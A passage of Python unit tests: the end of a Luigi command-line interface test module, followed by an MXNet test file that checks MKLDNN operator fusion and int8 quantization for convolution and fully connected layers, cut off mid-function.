with mock.patch("luigi.interface.setup_interface_logging.has_run", new=False):
if six.PY2:
error = ConfigParser.NoSectionError
else:
error = KeyError
self.assertRaises(error, luigi.interface.setup_interface_logging, '/blah')
@mock.patch("warnings.warn")
@mock.patch("luigi.interface.setup_interface_logging")
def test_cmdline_logger(self, setup_mock, warn):
with mock.patch("luigi.interface.core") as env_params:
env_params.return_value.logging_conf_file = None
luigi.run(['SomeTask', '--n', '7', '--local-scheduler', '--no-lock'])
self.assertEqual([mock.call(None)], setup_mock.call_args_list)
with mock.patch("luigi.configuration.get_config") as getconf:
getconf.return_value.get.side_effect = ConfigParser.NoOptionError(section='foo', option='bar')
getconf.return_value.getint.return_value = 0
luigi.interface.setup_interface_logging.call_args_list = []
luigi.run(['SomeTask', '--n', '42', '--local-scheduler', '--no-lock'])
self.assertEqual([], setup_mock.call_args_list)
@mock.patch('argparse.ArgumentParser.print_usage')
def test_non_existent_class(self, print_usage):
self.assertRaises(luigi.task_register.TaskClassNotFoundException,
luigi.run, ['--local-scheduler', '--no-lock', 'XYZ'])
@mock.patch('argparse.ArgumentParser.print_usage')
def test_no_task(self, print_usage):
self.assertRaises(SystemExit, luigi.run, ['--local-scheduler', '--no-lock'])
class InvokeOverCmdlineTest(unittest.TestCase):
def _run_cmdline(self, args):
env = os.environ.copy()
env['PYTHONPATH'] = env.get('PYTHONPATH', '') + ':.:test'
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)
stdout, stderr = p.communicate() # Unfortunately subprocess.check_output is 2.7+
return p.returncode, stdout, stderr
def test_bin_luigi(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['./bin/luigi', '--module', 'cmdline_test', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python(self):
t = luigi.LocalTarget(is_tmp=True)
args = ['python', 'test/cmdline_test.py', 'WriteToFile', '--filename', t.path, '--local-scheduler', '--no-lock']
self._run_cmdline(args)
self.assertTrue(t.exists())
def test_direct_python_help(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_direct_python_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['python', 'test/cmdline_test.py', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
def test_bin_luigi_help(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertFalse(stdout.find(b'--x') != -1)
def test_bin_luigi_help_no_module(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--help'])
self.assertTrue(stdout.find(b'usage:') != -1)
def test_bin_luigi_no_parameters(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi'])
self.assertTrue(stderr.find(b'No task specified') != -1)
def test_bin_luigi_help_class(self):
returncode, stdout, stderr = self._run_cmdline(['./bin/luigi', '--module', 'cmdline_test', 'FooBaseClass', '--help'])
self.assertTrue(stdout.find(b'--FooBaseClass-x') != -1)
self.assertTrue(stdout.find(b'--x') != -1)
class NewStyleParameters822Test(unittest.TestCase):
# See https://github.com/spotify/luigi/issues/822
def test_subclasses(self):
ap = luigi.interface._ArgParseInterface()
task, = ap.parse(['--local-scheduler', '--no-lock', 'FooSubClass', '--x', 'xyz', '--FooBaseClass-x', 'xyz'])
self.assertEquals(task.x, 'xyz')
# This won't work because --FooSubClass-x doesn't exist
self.assertRaises(BaseException, ap.parse, (['--local-scheduler', '--no-lock', 'FooBaseClass', '--x', 'xyz', '--FooSubClass-x', 'xyz']))
def test_subclasses_2(self):
ap = luigi.interface._ArgParseInterface()
# https://github.com/spotify/luigi/issues/822#issuecomment-77782714
task, = ap.parse(['--local-scheduler', '--no-lock', 'FooBaseClass', '--FooBaseClass-x', 'xyz'])
self.assertEquals(task.x, 'xyz')
if __name__ == '__main__':
# Needed for one of the tests
luigi.run()
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import mxnet as mx
import numpy as np
import unittest
import ctypes
from mxnet.module import Module
from mxnet.symbol import Symbol
from importlib import import_module
from numpy.testing import assert_allclose
from mxnet.base import SymbolHandle, check_call, _LIB, mx_uint, c_str
from mxnet.test_utils import DummyIter
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.append(os.path.join(curr_path, '../unittest/'))
from common import with_seed
from mxnet.test_utils import assert_almost_equal, assert_almost_equal_with_err
import itertools
OP_NAME='op_name'
QUANTIZED_OP_NAME='quantized_op_name'
SG_PASS_NAME='MKLDNN'
QUANTIZE_SG_PASS_NAME='MKLDNN_QUANTIZE'
config = {
'conv': {
OP_NAME: 'sg_mkldnn_conv',
QUANTIZED_OP_NAME: 'quantized_sg_mkldnn_conv'
},
'fc': {
OP_NAME: 'sg_mkldnn_fully_connected',
QUANTIZED_OP_NAME: 'quantized_sg_mkldnn_fully_connected'
}
}
DATA_SHAPE=[(64, 4, 10, 10), (4, 3, 24, 24), (1, 16, 32, 32)]
fc_post_ops_list=['relu', 'sigmoid', 'tanh', 'softrelu',
'square', 'square_root', 'abs', 'exp', 'bounded_relu']
def check_qsym_calibrated(qsym, out_type, name='conv'):
quantized_op_name = 'quantized_' + name
assert ''.join(qsym.attr_dict().keys()).find(quantized_op_name) != -1
for k, v in qsym.attr_dict().items():
if k.find('_quantize') != -1:
assert v['out_type'] == out_type
if k.find(quantized_op_name) != -1:
if quantized_op_name.startswith("quantized_sg_mkldnn_fully_connected") and 'enable_float_output' in v:
continue
assert 'min_calib_range' in v
assert 'max_calib_range' in v
def check_qsym_scale_align(qsym):
assert ''.join(qsym.attr_dict().keys()).find('quantized_sg_mkldnn_conv') != -1
init = False
for k, v in qsym.attr_dict().items():
if k.find('quantized_sg_mkldnn_conv') != -1:
assert 'min_calib_range' in v
assert 'max_calib_range' in v
if not init:
min_calib_range = v['min_calib_range']
max_calib_range = v['max_calib_range']
init = True
else:
assert min_calib_range == v['min_calib_range']
assert max_calib_range == v['max_calib_range']
def check_qsym_forward(qsym, qarg_params, qaux_params, batch, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.set_params(qarg_params, qaux_params)
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
return mod.get_outputs()
def check_qsym_dummy_forward(qsym, batch, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(initializer=mx.init.Xavier(magnitude=2.))
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
return mod.get_outputs()
def check_qsym_gluon_forward(qsym, qarg_params, qaux_params, data_shape):
# save qsym to JSON file
qsym.save('quantized-symbol.json')
# save params
save_dict = {('arg:%s' % k): v.as_in_context(mx.current_context()) for k, v in qarg_params.items()}
save_dict.update({('aux:%s' % k): v.as_in_context(mx.current_context()) for k, v in qaux_params.items()})
mx.nd.save('quantized-0000.params', save_dict)
# load back with SymbolBlock
net = mx.gluon.SymbolBlock.imports('quantized-symbol.json', ['data'], 'quantized-0000.params')
net.collect_params().reset_ctx(ctx = mx.current_context())
net.hybridize()
data = mx.random.uniform(-1.0, 1.0, shape=data_shape)
net(data)
class CalibIter(mx.io.DataIter):
def __init__(self, batch, data_shape, batch_size):
super(CalibIter, self).__init__(batch_size)
self.data_shape = data_shape
self.label_shape = (batch_size,)
self.provide_data = [('data', self.data_shape)]
self.provide_label = []
self.batch = batch
def __iter__(self):
yield self.batch
def check_quantize(sym, data_shape, out_type, name='conv',
check_calibration=True, gluon_forward=False, check_scale_align=False):
quantize_granularity_list = ['tensor-wise']
if name == 'fc':
quantize_granularity_list += ['channel-wise']
if name in config:
name = config[name][OP_NAME]
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
mod = Module(symbol=sym, label_names=None)
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(mx.init.Normal(0.5))
arg_params, aux_params = mod.get_params()
if out_type == 'uint8':
data = [mx.random.uniform(0.0, 1.0, shape=shape, ctx=mx.current_context()) for _, shape in mod.data_shapes]
else:
data = [mx.random.uniform(-1.0, 1.0, shape=shape, ctx=mx.current_context()) for _, shape in mod.data_shapes]
batch = mx.io.DataBatch(data, [])
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
ref_out = mod.get_outputs()
excluded_sym_names = []
excluded_op_names = []
if mx.current_context() == mx.cpu() and gluon_forward == True:
excluded_op_names += ['_sg_mkldnn_fully_connected']
calib_data = CalibIter(batch, data_shape, 1)
for quantize_granularity in quantize_granularity_list:
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params=arg_params,
aux_params=aux_params,
ctx=mx.current_context(),
excluded_sym_names=excluded_sym_names,
excluded_op_names=excluded_op_names,
quantized_dtype=out_type,
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full',
quantize_granularity=quantize_granularity)
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
if check_calibration:
check_qsym_calibrated(qsym, out_type, name=name)
if check_scale_align:
check_qsym_scale_align(qsym)
if gluon_forward == True:
check_qsym_gluon_forward(qsym, qarg_params, qaux_params, data_shape)
else:
quantized_out = check_qsym_forward(qsym, qarg_params, qaux_params, batch, data_shape)
for i in range(len(ref_out)):
min_range = mx.nd.min(ref_out[i]).asscalar()
max_range = mx.nd.max(ref_out[i]).asscalar()
atol = 0.1 * max(abs(min_range), abs(max_range))
assert_almost_equal_with_err(quantized_out[i].asnumpy(), ref_out[i].asnumpy(), rtol=0.1, atol=atol, etol=0.2)
check_qsym_dummy_forward(qsym, batch, data_shape)
@with_seed()
def check_quantize_whole_model_with_forward():
def check_qsym_forward(qsym, qarg_params, qaux_params, data_shape):
mod = Module(symbol=qsym, label_names=None, context=mx.current_context())
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.set_params(qarg_params, qaux_params)
data = [mx.random.uniform(-1.0, 1.0, shape=shape) for _, shape in mod.data_shapes]
batch = mx.io.DataBatch(data, [])
mod.forward(batch, is_train=False)
for output in mod.get_outputs():
output.wait_to_read()
def check_quantize_whole_model(out_type):
batch_size = 4
data_shape = (batch_size, 4, 10, 10)
data = mx.sym.Variable('data')
conv0 = mx.sym.Convolution(data, kernel=(1, 1), num_filter=16, name='conv0')
sym = mx.sym.Convolution(conv0, kernel=(1, 1), num_filter=16, name='conv1')
sym_sg = sym.get_backend_symbol('MKLDNN_QUANTIZE')
mod = Module(symbol=sym, label_names=None)
mod.bind(for_training=False,
data_shapes=[('data', data_shape)])
mod.init_params(mx.init.Normal(0.5))
arg_params, aux_params = mod.get_params()
excluded_sym_names = []
calib_data = mx.nd.random.uniform(shape=data_shape)
calib_data = mx.io.NDArrayIter(data=calib_data)
calib_data = DummyIter(calib_data)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params=arg_params,
aux_params=aux_params,
ctx=mx.current_context(),
excluded_sym_names=excluded_sym_names,
quantized_dtype=out_type,
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qsym = qsym.get_backend_symbol('MKLDNN_QUANTIZE')
check_qsym_forward(qsym, qarg_params, qaux_params, data_shape)
for qdtype in ['uint8', 'int8', 'auto']:
check_quantize_whole_model(qdtype)
@with_seed()
def check_fusion(sym, data_shape, attrs_dict, check_fp32_fusion=True, check_quantization=True, out_types=['uint8', 'int8', 'auto']):
if check_fp32_fusion:
data_min = -1.0
data_max = 1.0
if ''.join(sym.get_internals().list_outputs()).find('sqrt') != -1:
check_quantization = False
data_min = 0
sym_sg = sym.get_backend_symbol(SG_PASS_NAME)
for name, attrs in attrs_dict.items():
if name in config:
op_name = config[name][OP_NAME]
else:
op_name = name
assert ''.join(sym_sg.get_internals().list_outputs()).find(op_name) != -1
if len(attrs):
found = False
for k, v in sym_sg.attr_dict().items():
if k.find(op_name) != -1:
found = True
for attr_name, attr_value in attrs.items():
assert v[attr_name].lower() == attr_value.lower()
assert found
arg_shapes, _, aux_shapes = sym.infer_shape()
arg_array = [mx.nd.random.uniform(data_min, data_max, shape=shape) for shape in arg_shapes]
aux_array = [mx.nd.random.uniform(shape=shape) for shape in aux_shapes]
exe = sym.bind(ctx=mx.current_context(), args=arg_array, aux_states=aux_array, grad_req='null')
exe.forward()
os.environ['MXNET_SUBGRAPH_BACKEND'] = SG_PASS_NAME
exe_sg = sym.bind(ctx=mx.current_context(), args=arg_array, aux_states=aux_array, grad_req='null')
exe_sg.forward()
del os.environ['MXNET_SUBGRAPH_BACKEND']
for i in range(len(exe.outputs)):
assert_almost_equal(exe.outputs[i].asnumpy(), exe_sg.outputs[i].asnumpy(), rtol=1e-3, atol=1e-1)
if check_quantization:
# fp32 to int8
for out_type in out_types:
check_quantize(sym, data_shape, out_type, name=name)
# TODO(ciyong), since quantized fc save its params in int8, while gluon treat the default
# variable from symbol file as fp32 which results in mismatch dtype of params.
# Skip quantized fc in gluon pass.
if name != 'fc':
check_quantize(sym, data_shape, out_type, name=name, gluon_forward=True)
def check_neg_fusion(syms, attrs_name=None, excluded_attrs=None,
date_shape=(4,4,10,10), name='conv'):
op_name = config[name][OP_NAME]
for sym, attrs, excluded_attr in zip(syms, attrs_name, excluded_attrs):
sym_sg = sym.get_backend_symbol(SG_PASS_NAME)
exe_sg = sym_sg.simple_bind(mx.cpu(), data=date_shape, grad_req='null')
attrs_dict = sym_sg.attr_dict()
for k, v in attrs_dict.items():
if k.find(op_name) != -1:
for attr in attrs:
assert v[attr] == 'true'
for exc_attr in excluded_attr:
assert exc_attr not in v.keys()
def head_symbol(data_shape):
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
return data, weight
# single conv fusion case
def single_conv(no_bias, data_shape):
attr = {'conv': []}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
return conv, attr
# conv + bn fusion case
def conv_bn(no_bias, data_shape):
attr = {'conv': {'with_bn': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
return bn1, attr
# conv + act fusion case
def conv_act(no_bias, data_shape, alg):
attr = {'conv': {'with_act': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
if alg == "relu6":
relu = mx.symbol.clip(data=conv, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=conv, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=conv, act_type='gelu')
else:
relu = mx.symbol.Activation(data=conv, name=alg, act_type=alg)
return relu, attr
# conv + act + sum fusion case
def conv_act_sum(no_bias, data_shape, alg):
attr = {'conv': {'with_act': 'true', 'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
if alg == "relu6":
relu = mx.symbol.clip(data=conv, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=conv, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=conv, act_type='gelu')
else:
relu = mx.symbol.Activation(data=conv, name=alg, act_type=alg)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
sum = relu + conv1
return sum, attr
# conv + add fusion case
def conv_add(no_bias, data_shape):
attr = {'conv': {'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
conv2 = mx.symbol.Convolution(data=data, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1))
pool = mx.sym.Pooling(data=conv2, kernel=(1, 1), pool_type='avg', name='pool')
sum = conv1 + pool
return sum, attr
# conv + add fusion case 2
def conv_add2(no_bias, data_shape):
attr = {'conv': {'with_sum': 'true'}}
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
conv2 = mx.symbol.Convolution(data=data, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1))
pool = mx.sym.Pooling(data=conv2, kernel=(1, 1), pool_type='avg', name='pool')
sum = pool + conv1
return sum, attr
# conv + bn + act fusion case
def conv_bn_act(no_bias, data_shape, alg):
attr = {'conv': {'with_bn': 'true', 'with_act': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
if alg == "relu6":
relu = mx.symbol.clip(data=bn1, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=bn1, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=bn1, act_type='gelu')
else:
relu = mx.symbol.Activation(data=bn1, name=alg, act_type=alg)
return relu, attr
# conv + bn + add + act fusion case
def conv_bn_sum_act(no_bias, data_shape, alg):
attr = {'conv': {'with_sum': 'true', 'with_postsum_act': 'true', 'with_bn': 'true'}}
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=no_bias)
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1))
sum1 = bn1 + conv1
if alg == "relu6":
relu = mx.symbol.clip(data=sum1, name='relu6', a_min=0, a_max=6)
elif alg == "leakyrelu":
relu = mx.symbol.LeakyReLU(data=sum1, slope=0.25, act_type='leaky')
elif alg == "gelu":
relu = mx.symbol.LeakyReLU(data=sum1, act_type='gelu')
else:
relu = mx.symbol.Activation(data=sum1, name=alg, act_type=alg)
return relu, attr
# single concat case
def single_concat(data_shape, input_num, dim):
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
inputs = []
for i in range(input_num):
inputs.append(data)
concat = mx.symbol.Concat(*inputs, name="concat", dim=dim)
return concat
def single_concat_pos_neg(data_shape):
data, weight = head_symbol(data_shape)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=4,
kernel=(1, 1), stride=(1, 1), no_bias=True)
relu = mx.symbol.Activation(data=conv, name='relu', act_type='relu')
inputs = [data, relu]
concat = mx.symbol.Concat(*inputs, name="concat", dim=1)
return concat
# concat scale alignment case
def concat_scale_align(data_shape):
data, weight = head_symbol(data_shape)
conv1 = mx.symbol.Convolution(data=data, weight=weight, name='conv1', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv2 = mx.symbol.Convolution(data=data, weight=weight * 2, name='conv2', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv3 = mx.symbol.Convolution(data=data, weight=weight * 3, name='conv3', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
conv4 = mx.symbol.Convolution(data=data, weight=weight * 4, name='conv4', num_filter=64,
kernel=(3, 3), stride=(1, 1), no_bias=True)
concat = mx.symbol.Concat(*[conv1, conv2, conv3, conv4], name="concat", dim=1)
return concat
# mobilenetv2 case
def mobilenetv2_struct(data_shape):
attr = {'sg_mkldnn_conv_bn_0' : {'with_bn': 'true'}}
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight1 = mx.symbol.Variable('conv1_weight', dtype='float32')
weight2 = mx.symbol.Variable('conv2_weight', dtype='float32')
conv1 = mx.symbol.Convolution(data=data, weight=weight1, name='conv1', num_filter=64,
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn1 = mx.symbol.BatchNorm(data=conv1, name="bn1")
conv2 = mx.symbol.Convolution(data=bn1, weight=weight2, name='conv2', num_filter=64,
kernel=(1, 1), stride=(1, 1), no_bias=True)
bn2 = mx.symbol.BatchNorm(data=conv2, name="bn2")
sum = bn1 + bn2
return sum, attr
def tail_neg_symbol(sym1, sym2):
fc1 = mx.sym.FullyConnected(data=sym1, num_hidden=10, flatten=True, name='fc1')
fc2 = mx.sym.FullyConnected(data=sym2, num_hidden=10, flatten=True, name='fc2')
concat = mx.sym.Concat(*[fc1, fc2], name="concat")
sym = mx.sym.SoftmaxOutput(data=concat, name='softmax')
return sym
# conv + bn can't be fusion case
# eg.1
# conv --------- > bn
# |
# |
# -------------> [custom op]
def neg_conv_bn(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn1 = mx.symbol.BatchNorm(data=conv, name="bn1")
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(bn1, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
# conv + relu can't be fusion case
# eg.1
# conv -----------> relu
# |
# |
# ---------------> [custom op]
def neg_conv_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
relu = mx.symbol.Activation(data=conv, name='relu', act_type="relu")
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(relu, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
# conv + add can't be fusion case
# eg.1
# ---------------> [custom op]
# |
# |
# conv -----------> add
# |
# |
# added ------------>
def neg_conv_add(data_shape):
syms = []
attrs = []
excluded_attrs = []
val = mx.symbol.Variable('addval')
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool, [added op] = val)
conv = mx.symbol.Convolution(data=data, weight=weight, name='conv', num_filter=64, kernel=(3, 3), stride=(1, 1))
sum1 = conv + val
pool = mx.sym.Pooling(data=conv, kernel=(4, 4), pool_type='avg', name='pool')
sym = tail_neg_symbol(sum1, pool)
syms.append(sym)
attrs.append([])
excluded_attrs.append('with_sum')
return syms, attrs, excluded_attrs
# conv + bn + relu can't be fusion case
# eg.1
# --------------> [custom op]
# |
# conv -----------> bn -----------> relu
#
# eg.2
# --------------> [custom op]
# |
# conv -----------> bn -----------> relu
def neg_conv_bn_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool11)
conv11 = mx.symbol.Convolution(data=data, weight=weight, name='conv11', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn11 = mx.symbol.BatchNorm(data=conv11, name="bn11")
relu11 = mx.symbol.Activation(data=bn11, name='relu11', act_type="relu")
pool11 = mx.sym.Pooling(data=conv11, kernel=(4, 4), pool_type='avg', name='pool11')
sym1 = tail_neg_symbol(relu11, pool11)
syms.append(sym1)
attrs.append([])
excluded_attrs.append([])
# eg.2 ([custom op] = pool)
conv21 = mx.symbol.Convolution(data=data, weight=weight, name='conv21', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn21 = mx.symbol.BatchNorm(data=conv21, name="bn21")
relu21 = mx.symbol.Activation(data=bn21, name='relu21', act_type="relu")
pool21 = mx.sym.Pooling(data=bn21, kernel=(4, 4), pool_type='avg', name='pool21')
sym2 = tail_neg_symbol(relu21, pool21)
syms.append(sym2)
attrs.append(['with_bn'])
excluded_attrs.append(['with_act'])
return syms, attrs, excluded_attrs
# conv + bn + add + relu can't be fusion case
# eg.1
# --------------> [custom op]
# |
# conv -----------> bn -----------> add -----------> relu
#
# eg.2
# -------------> [custom op]
# |
# conv -----------> bn -----------> add -----------> relu
#
# eg.3
# --------------> [custom op]
# |
# conv -----------> bn -----------> add -----------> relu
def neg_conv_bn_add_relu(data_shape):
syms = []
attrs = []
excluded_attrs = []
addVal = mx.symbol.Variable('addval')
data, weight = head_symbol(data_shape)
# eg.1
conv11 = mx.symbol.Convolution(data=data, weight=weight, name='conv11', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn11 = mx.symbol.BatchNorm(data=conv11, name="bn11")
sum11 = bn11 + addVal
relu11 = mx.symbol.Activation(data=sum11, name='relu11', act_type="relu")
pool11 = mx.sym.Pooling(data=conv11, kernel=(4, 4), pool_type='avg', name='pool11')
sym1 = tail_neg_symbol(relu11, pool11)
syms.append(sym1)
attrs.append([])
excluded_attrs.append(['with_sum', 'with_postsum_act', 'with_bn'])
# eg.2
conv21 = mx.symbol.Convolution(data=data, weight=weight, name='conv21', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn21 = mx.symbol.BatchNorm(data=conv21, name="bn21")
sum21 = bn21 + addVal
relu21 = mx.symbol.Activation(data=sum21, name='relu21', act_type="relu")
pool21 = mx.sym.Pooling(data=bn21, kernel=(4, 4), pool_type='avg', name='pool21')
sym2 = tail_neg_symbol(relu21, pool21)
syms.append(sym2)
attrs.append(['with_bn'])
excluded_attrs.append(['with_sum', 'with_postsum_act'])
# eg.3
conv31 = mx.symbol.Convolution(data=data, weight=weight, name='conv31', num_filter=64, kernel=(3, 3), stride=(1, 1))
bn31 = mx.symbol.BatchNorm(data=conv31, name="bn31")
sum31 = bn31 + addVal
relu31 = mx.symbol.Activation(data=sum31, name='relu31', act_type="relu")
pool31 = mx.sym.Pooling(data=sum31, kernel=(4, 4), pool_type='avg', name='pool31')
sym3 = tail_neg_symbol(relu31, pool31)
syms.append(sym3)
attrs.append(['with_bn', 'with_sum'])
excluded_attrs.append(['with_postsum_act'])
return syms, attrs, excluded_attrs
def single_fc(no_bias, data_shape, flatten=True):
attr = {'fc': {}}
data, weight = head_symbol(data_shape)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
return fc, attr
# fc + eltwise fusion case
def fc_eltwise(no_bias, data_shape, flatten=True, alg='relu'):
assert alg in fc_post_ops_list
attr = {'fc': {'with_eltwise': 'true'}}
data, weight = head_symbol(data_shape)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
if alg in ['relu', 'sigmoid', 'tanh', 'softrelu']:
sym = mx.symbol.Activation(data=fc, name='act', act_type=alg)
elif alg == 'square':
sym = mx.symbol.square(data=fc, name='square')
elif alg == 'square_root':
sym = mx.symbol.sqrt(data=fc, name='sqrt')
elif alg == 'abs':
sym = mx.symbol.abs(data=fc, name='abs')
elif alg == 'exp':
sym = mx.symbol.exp(data=fc, name='exp')
else:
sym = mx.symbol.clip(data=fc, name='bounded_relu', a_min=0, a_max=1.0)
return sym, attr
# fc + relu can't be fusion case
# eg.1
# fc -----------> relu
# |
# |
# ---------------> [custom op]
def neg_fc_relu(no_bias, data_shape, flatten=True):
syms = []
attrs = []
excluded_attrs = []
data, weight = head_symbol(data_shape)
# eg.1 ([custom op] = pool)
fc = mx.symbol.FullyConnected(name='fc', data=data, weight=weight, num_hidden=64,
no_bias=no_bias, flatten=flatten)
relu = mx.symbol.Activation(data=fc, name='relu', act_type="relu")
sigmoid = mx.symbol.Activation(data=fc, name='sigmoid', act_type="sigmoid")
sym = tail_neg_symbol(relu, sigmoid)
syms.append(sym)
attrs.append([])
excluded_attrs.append([])
return syms, attrs, excluded_attrs
@with_seed()
def test_pos_single_conv():
for data_shape in DATA_SHAPE:
net, attrs = single_conv(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = single_conv(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": True,
"leakyrelu": True,
"gelu": True}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_conv_bn():
for data_shape in DATA_SHAPE:
net, attrs = conv_bn(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_bn(True, data_shape)
